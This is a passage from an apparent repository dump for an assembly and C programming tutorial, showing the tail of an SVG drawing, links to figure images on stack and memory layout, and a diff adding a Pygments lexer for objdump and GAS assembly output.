417 |          d="m 40.403184,25.29443 c 0,5.906663 -4.788297,10.69496 -10.694961,10.69496 -5.906663,0 -10.69496,-4.788297 -10.69496,-10.69496 0,-5.906664 4.788297,-10.694961 10.69496,-10.694961 5.906664,0 10.694961,4.788297 10.694961,10.694961 z"
418 |          sodipodi:ry="10.694961"
419 |          sodipodi:rx="10.694961"
420 |          sodipodi:cy="25.29443"
421 |          sodipodi:cx="29.708223"
422 |          id="path7064"
423 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
424 |          sodipodi:type="arc"
425 |          transform="matrix(0.6112459,7.5194775e-2,-7.5194775e-2,0.6112459,25.577299,26.107116)" />
426 |       <path
427 |          transform="matrix(0.6112459,7.5194775e-2,-7.5194775e-2,0.6112459,25.042415,24.461272)"
428 |          d="m 36.159151,27.586206 c 0,2.765819 -2.242139,5.007958 -5.007957,5.007958 -2.765819,0 -5.007958,-2.242139 -5.007958,-5.007958 0,-2.765818 2.242139,-5.007957 5.007958,-5.007957 2.765818,0 5.007957,2.242139 5.007957,5.007957 z"
429 |          sodipodi:ry="5.0079575"
430 |          sodipodi:rx="5.0079575"
431 |          sodipodi:cy="27.586206"
432 |          sodipodi:cx="31.151194"
433 |          id="path7066"
434 |          style="opacity:1;fill:#f9f9f9;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
435 |          sodipodi:type="arc" />
436 |       <rect
437 |          y="29.689009"
438 |          x="45.928555"
439 |          height="2.6137028"
440 |          width="2.4046063"
441 |          id="rect7068"
442 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
443 |          transform="matrix(0.992518,0.1220984,-0.1220984,0.992518,0,0)" />
444 |       <rect
445 |          transform="matrix(0.992518,0.1220984,0.1220984,-0.992518,0,0)"
446 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
447 |          id="rect7070"
448 |          width="2.4046063"
449 |          height="2.6137028"
450 |          x="45.928555"
451 |          y="-46.8349" />
452 |       <rect
453 |          transform="matrix(-0.1220984,0.992518,-0.992518,-0.1220984,0,0)"
454 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
455 |          id="rect7072"
456 |          width="2.4046063"
457 |          height="2.6137028"
458 |          x="37.425571"
459 |          y="-40.910248" />
460 |       <rect
461 |          y="-55.690735"
462 |          x="37.425571"
463 |          height="2.6137028"
464 |          width="2.4046063"
465 |          id="rect7074"
466 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
467 |          transform="matrix(-0.1220984,0.992518,-0.992518,-0.1220984,0,0)" />
468 |       <rect
469 |          y="-54.096272"
470 |          x="-4.6281481"
471 |          height="2.6137028"
472 |          width="2.4046063"
473 |          id="rect7076"
474 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
475 |          transform="matrix(-0.7597464,0.6502195,-0.6502195,-0.7597464,0,0)" />
476 |       <rect
477 |          transform="matrix(-0.7597464,0.6502195,-0.6502195,-0.7597464,0,0)"
478 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
479 |          id="rect7078"
480 |          width="2.4046063"
481 |          height="2.6137028"
482 |          x="-4.7539773"
483 |          y="-69.420166" />
484 |       <rect
485 |          y="9.659668"
486 |          x="-62.396496"
487 |          height="2.6137028"
488 |          width="2.4046063"
489 |          id="rect7080"
490 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
491 |          transform="matrix(-0.6502195,-0.7597464,0.7597464,-0.6502195,0,0)" />
492 |       <rect
493 |          transform="matrix(-0.6502195,-0.7597464,0.7597464,-0.6502195,0,0)"
494 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
495 |          id="rect7082"
496 |          width="2.4046063"
497 |          height="2.6137028"
498 |          x="-61.263523"
499 |          y="-5.6816974" />
500 |       <path
501 |          transform="matrix(0.7132984,0.3256087,-0.3256087,0.7132984,7.0491312,18.79887)"
502 |          sodipodi:type="arc"
503 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
504 |          id="path7084"
505 |          sodipodi:cx="29.708223"
506 |          sodipodi:cy="25.29443"
507 |          sodipodi:rx="10.694961"
508 |          sodipodi:ry="10.694961"
509 |          d="m 40.403184,25.29443 c 0,5.906663 -4.788297,10.69496 -10.694961,10.69496 -5.906663,0 -10.69496,-4.788297 -10.69496,-10.69496 0,-5.906664 4.788297,-10.694961 10.69496,-10.694961 5.906664,0 10.694961,4.788297 10.694961,10.694961 z" />
510 |       <path
511 |          sodipodi:type="arc"
512 |          style="opacity:1;fill:#f9f9f9;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
513 |          id="path7086"
514 |          sodipodi:cx="31.151194"
515 |          sodipodi:cy="27.586206"
516 |          sodipodi:rx="5.0079575"
517 |          sodipodi:ry="5.0079575"
518 |          d="m 36.159151,27.586206 c 0,2.765819 -2.242139,5.007958 -5.007957,5.007958 -2.765819,0 -5.007958,-2.242139 -5.007958,-5.007958 0,-2.765818 2.242139,-5.007957 5.007958,-5.007957 2.765818,0 5.007957,2.242139 5.007957,5.007957 z"
519 |          transform="matrix(0.7132984,0.3256087,-0.3256087,0.7132984,7.0306342,16.595584)" />
520 |       <rect
521 |          transform="matrix(0.9097013,0.4152632,-0.4152632,0.9097013,0,0)"
522 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
523 |          id="rect7088"
524 |          width="3.0615325"
525 |          height="3.3277531"
526 |          x="36.174374"
527 |          y="22.650513" />
528 |       <rect
529 |          y="-45.155357"
530 |          x="35.922562"
531 |          height="3.3277531"
532 |          width="3.0615325"
533 |          id="rect7090"
534 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
535 |          transform="matrix(0.9097013,0.4152632,0.4152632,-0.9097013,0,0)" />
536 |       <rect
537 |          y="-29.926081"
538 |          x="32.809532"
539 |          height="3.3277531"
540 |          width="3.0615325"
541 |          id="rect7092"
542 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
543 |          transform="matrix(-0.4152632,0.9097013,-0.9097013,-0.4152632,0,0)" />
544 |       <rect
545 |          transform="matrix(-0.4152632,0.9097013,-0.9097013,-0.4152632,0,0)"
546 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
547 |          id="rect7094"
548 |          width="3.0615325"
549 |          height="3.3277531"
550 |          x="32.809532"
551 |          y="-48.744522" />
552 |       <rect
553 |          transform="matrix(-0.9202627,0.3913012,-0.3913012,-0.9202627,0,0)"
554 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
555 |          id="rect7096"
556 |          width="3.0615327"
557 |          height="3.3277533"
558 |          x="-1.9852462"
559 |          y="-42.728115" />
560 |       <rect
561 |          y="-61.882915"
562 |          x="-1.7432038"
563 |          height="3.3277533"
564 |          width="3.0615327"
565 |          id="rect7098"
566 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
567 |          transform="matrix(-0.9202627,0.3913012,-0.3913012,-0.9202627,0,0)" />
568 |       <rect
569 |          transform="matrix(-0.3913012,-0.9202627,0.9202627,-0.3913012,0,0)"
570 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
571 |          id="rect7100"
572 |          width="3.0615327"
573 |          height="3.3277533"
574 |          x="-53.073265"
575 |          y="8.3015547" />
576 |       <rect
577 |          y="-11.250683"
578 |          x="-52.544754"
579 |          height="3.3277533"
580 |          width="3.0615327"
581 |          id="rect7102"
582 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
583 |          transform="matrix(-0.3913012,-0.9202627,0.9202627,-0.3913012,0,0)" />
584 |     </g>
585 |   </g>
586 | </svg>
587 | 


--------------------------------------------------------------------------------
/figures/hamster.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/hamster.jpg


--------------------------------------------------------------------------------
/figures/ia32-eflags.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/ia32-eflags.png


--------------------------------------------------------------------------------
/figures/lifostack.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/lifostack.png


--------------------------------------------------------------------------------
/figures/memlayout.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/memlayout.png


--------------------------------------------------------------------------------
/figures/memlayoutvm.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/memlayoutvm.png


--------------------------------------------------------------------------------
/figures/monolithic.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/monolithic.png


--------------------------------------------------------------------------------
/figures/simd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/simd.png


--------------------------------------------------------------------------------
/figures/stackframe.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/stackframe.png


--------------------------------------------------------------------------------
/figures/syscalls.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/syscalls.png


--------------------------------------------------------------------------------
/figures/x86stack.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/x86stack.png


--------------------------------------------------------------------------------
/figures/x86stackalloc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/x86stackalloc.png


--------------------------------------------------------------------------------
/figures/x86stackpop.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/x86stackpop.png


--------------------------------------------------------------------------------
/figures/x86stackpush.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/x86stackpush.png


--------------------------------------------------------------------------------
/pygments_objdump_mods.diff:
--------------------------------------------------------------------------------
  1 | diff -r 34cc08a2c354 pygments/lexers/_mapping.py
  2 | --- a/pygments/lexers/_mapping.py	Sun Mar 18 08:09:21 2012 +0100
  3 | +++ b/pygments/lexers/_mapping.py	Sun Mar 25 17:58:11 2012 -0400
  4 | @@ -66,6 +66,7 @@
  5 |      'CssLexer': ('pygments.lexers.web', 'CSS', ('css',), ('*.css',), ('text/css',)),
  6 |      'CssPhpLexer': ('pygments.lexers.templates', 'CSS+PHP', ('css+php',), (), ('text/css+php',)),
  7 |      'CssSmartyLexer': ('pygments.lexers.templates', 'CSS+Smarty', ('css+smarty',), (), ('text/css+smarty',)),
  8 | +    'CustomObjdumpLexer': ('pygments.lexers.customobjdump', 'customobjdump', ('customobjdump',), ('*.objdump',), ('text/x-objdump',)),
  9 |      'CythonLexer': ('pygments.lexers.compiled', 'Cython', ('cython', 'pyx'), ('*.pyx', '*.pxd', '*.pxi'), ('text/x-cython', 'application/x-cython')),
 10 |      'DLexer': ('pygments.lexers.compiled', 'D', ('d',), ('*.d', '*.di'), ('text/x-dsrc',)),
 11 |      'DObjdumpLexer': ('pygments.lexers.asm', 'd-objdump', ('d-objdump',), ('*.d-objdump',), ('text/x-d-objdump',)),
 12 | diff -r 34cc08a2c354 pygments/lexers/customobjdump.py
 13 | --- /dev/null	Thu Jan 01 00:00:00 1970 +0000
 14 | +++ b/pygments/lexers/customobjdump.py	Sun Mar 25 17:58:11 2012 -0400
 15 | @@ -0,0 +1,138 @@
 16 | +import re
 17 | +
 18 | +from pygments.lexer import RegexLexer, include, bygroups, using, DelegatingLexer
 19 | +from pygments.lexers.compiled import DLexer, CppLexer, CLexer
 20 | +from pygments.token import *
 21 | +
 22 | +__all__ = ['GasLexer', 'CustomObjdumpLexer']
 23 | +
 24 | +class GasLexer(RegexLexer):
 25 | +    """
 26 | +    For Gas (AT&T) assembly code.
 27 | +    """
 28 | +    name = 'GAS'
 29 | +    aliases = ['gas']
 30 | +    filenames = ['*.s', '*.S']
 31 | +    mimetypes = ['text/x-gas']
 32 | +
 33 | +    #: optional Comment or Whitespace
 34 | +    string = r'"(\\"|[^"])*"'
 35 | +    char = r'[a-zA-Z$._0-9@]'
 36 | +    identifier = r'(?:[a-zA-Z$_]' + char + '*|\.' + char + '+)'
 37 | +    number = r'(?:0[xX][a-zA-Z0-9]+|\d+)'
 38 | +
 39 | +    tokens = {
 40 | +        'root': [
 41 | +            include('whitespace'),
 42 | +            (identifier + ':', Name.Label),
 43 | +            (r'\.' + identifier, Name.Attribute, 'directive-args'),
 44 | +            (r'lock|rep(n?z)?|data\d+', Name.Attribute),
 45 | +            (identifier, Name.Function, 'instruction-args'),
 46 | +            (r'[\r\n]+', Text)
 47 | +        ],
 48 | +        'directive-args': [
 49 | +            (identifier, Name.Constant),
 50 | +            (string, String),
 51 | +            ('@' + identifier, Name.Attribute),
 52 | +            (number, Number.Integer),
 53 | +            (r'[\r\n]+', Text, '#pop'),
 54 | +
 55 | +            (r'#.*?$', Comment, '#pop'),
 56 | +
 57 | +            include('punctuation'),
 58 | +            include('whitespace')
 59 | +        ],
 60 | +        'instruction-args': [
 61 | +            # For objdump-disassembled code, shouldn't occur in
 62 | +            # actual assembler input
 63 | +            ('([a-z0-9]+)( )(<)('+identifier+')(>)',
 64 | +                bygroups(Number.Hex, Text, Punctuation, Name.Constant,
 65 | +                         Punctuation)),
 66 | +            ('([a-z0-9]+)( )(<)('+identifier+')([-+])('+number+')(>)',
 67 | +                bygroups(Number.Hex, Text, Punctuation, Name.Constant,
 68 | +                         Punctuation, Number.Integer, Punctuation)),
 69 | +
 70 | +            # Address constants
 71 | +            (identifier, Name.Constant),
 72 | +            (number, Number.Integer),
 73 | +            # Registers
 74 | +            ('%' + identifier, Name.Variable),
 75 | +            # Numeric constants
 76 | +            ('$'+number, Number.Integer),
 77 | +            (r'[\r\n]+', Text, '#pop'),
 78 | +            (r'#.*?$', Comment, '#pop'),
 79 | +            include('punctuation'),
 80 | +            include('whitespace')
 81 | +        ],
 82 | +        'whitespace': [
 83 | +            (r'\n', Text),
 84 | +            (r'\s+', Text),
 85 | +            (r'#.*?\n', Comment)
 86 | +        ],
 87 | +        'punctuation': [
 88 | +            (r'[-*,.():]+', Punctuation)
 89 | +        ]
 90 | +    }
 91 | +
 92 | +    def analyse_text(text):
 93 | +        if re.match(r'^\.(text|data|section)', text, re.M):
 94 | +            return True
 95 | +        elif re.match(r'^\.\w+', text, re.M):
 96 | +            return 0.1
 97 | +
 98 | +
 99 | +
100 | +class CustomObjdumpLexer(RegexLexer):
101 | +    """
102 | +    For the output of 'objdump -dr'
103 | +    """
104 | +    name = 'customobjdump'
105 | +    aliases = ['customobjdump']
106 | +    filenames = ['*.objdump']
107 | +    mimetypes = ['text/x-objdump']
108 | +
109 | +    hex = r'[0-9A-Za-z]'
110 | +
111 | +    tokens = {
112 | +        'root': [
113 | +            # File name & format:
114 | +            ('(.*?)(:)( +file format )(.*?)$',
115 | +                bygroups(Name.Label, Punctuation, Text, String)),
116 | +            # Section header
117 | +            ('(Disassembly of section )(.*?)(:)$',
118 | +                bygroups(Text, Name.Label, Punctuation)),
119 | +            # Function labels
120 | +            # (With offset)
121 | +            ('('+hex+'+)( )(<)(.*?)([-+])(0[xX][A-Za-z0-9]+)(>:)$',
122 | +                bygroups(Number.Hex, Text, Punctuation, Name.Function,
123 | +                         Punctuation, Number.Hex, Punctuation)),
124 | +            # (Without offset)
125 | +            ('('+hex+'+)( )(<)(.*?)(>:)$',
126 | +                bygroups(Number.Hex, Text, Punctuation, Name.Function,
127 | +                         Punctuation)),
128 | +            # Code line with disassembled instructions
129 | +            ('( *)('+hex+r'+:)( )((?:'+hex+hex+' )+)( * )([a-zA-Z].*?)$',
130 | +                bygroups(Text, Name.Label, Text, Number.Hex, Text,
131 | +                         using(GasLexer))),
132 | +            # Code line with ascii
133 | +            ('( *)('+hex+r'+:)( )((?:'+hex+hex+' )+)( *)(.*?)$',
134 | +                bygroups(Text, Name.Label, Text, Number.Hex, Text, String)),
135 | +            # Continued code line, only raw opcodes without disassembled
136 | +            # instruction
137 | +            ('( *)('+hex+r'+:)( )((?:'+hex+hex+' )+)$',
138 | +                bygroups(Text, Name.Label, Text, Number.Hex)),
139 | +            # Skipped a few bytes
140 | +            ('\.\.\.$', Text),
141 | +            # Relocation line
142 | +            # (With offset)
143 | +            ('(\t\t\t)('+hex+'+:)( )([^\t]+)(\t)(.*?)([-+])(0x' + hex + '+)$',
144 | +                bygroups(Text, Name.Label, Text, Name.Property, Text,
145 | +                         Name.Constant, Punctuation, Number.Hex)),
146 | +            # (Without offset)
147 | +            ('(\t\t\t)('+hex+'+:)( )([^\t]+)(\t)(.*?)$',
148 | +                bygroups(Text, Name.Label, Text, Name.Property, Text,
149 | +                         Name.Constant)),
150 | +            ('[^\n]+\n', Other)
151 | +        ]
152 | +    }
153 | +
154 | 


--------------------------------------------------------------------------------